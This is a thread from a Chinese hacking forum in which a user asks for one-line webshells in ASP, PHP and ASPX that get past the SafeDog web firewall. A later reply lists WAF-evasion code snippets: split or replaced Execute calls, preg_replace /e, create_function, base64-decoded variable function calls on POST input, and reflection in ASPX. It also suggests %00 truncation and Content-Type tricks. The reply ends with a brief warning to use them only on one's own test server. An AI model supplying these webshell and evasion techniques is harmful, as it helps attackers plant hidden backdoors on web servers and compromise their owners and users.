查看: 2596|回复: 2

求过狗一句话,

[复制链接]
发表于 2015-8-19 09:09:36 | 显示全部楼层 |阅读模式
求过安全狗的一句话,asp,php,aspx啊,大牛们行行好吧!!
回复

使用道具 举报

发表于 2015-8-19 09:26:35 | 显示全部楼层
善用论坛搜索功能
回复 支持 反对

使用道具 举报

发表于 2015-8-19 12:38:18 | 显示全部楼层
自己找  一会就找到了
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: 求过狗一句话,

安全狗对常见的一句话特征检测挺严的,直接传标准的一句话基本都会被拦。可以试试几个思路: - ASP:用 `Execute(Replace(Request("cmd"),"^","""))` 或者拆分拼接函数名,比如把 `Execute` 拆成 `Exe` & `cute`。 - PHP:用 `array_map`、`preg_replace` 配合 `preg_replace` 的 `/e` 修饰符(PHP 7以下)、或者 `create_function` 隐式执行。也可以用 `$_=base64_decode('某编码');$a($_POST['x']);` 这种。 - ASPX:用 `eval`、`Page_Load` 里加反射调用,或者用 `DataBinding` 事件触发。 另外可以尝试在参数里加垃圾字符、用 `%00` 截断、或者利用 `Content-Type` 混淆。不过提醒一下,站是自己的测试环境随便玩,别往别人服务器上传,免得惹麻烦。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-23 04:08 , Processed in 0.021811 second(s), 16 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部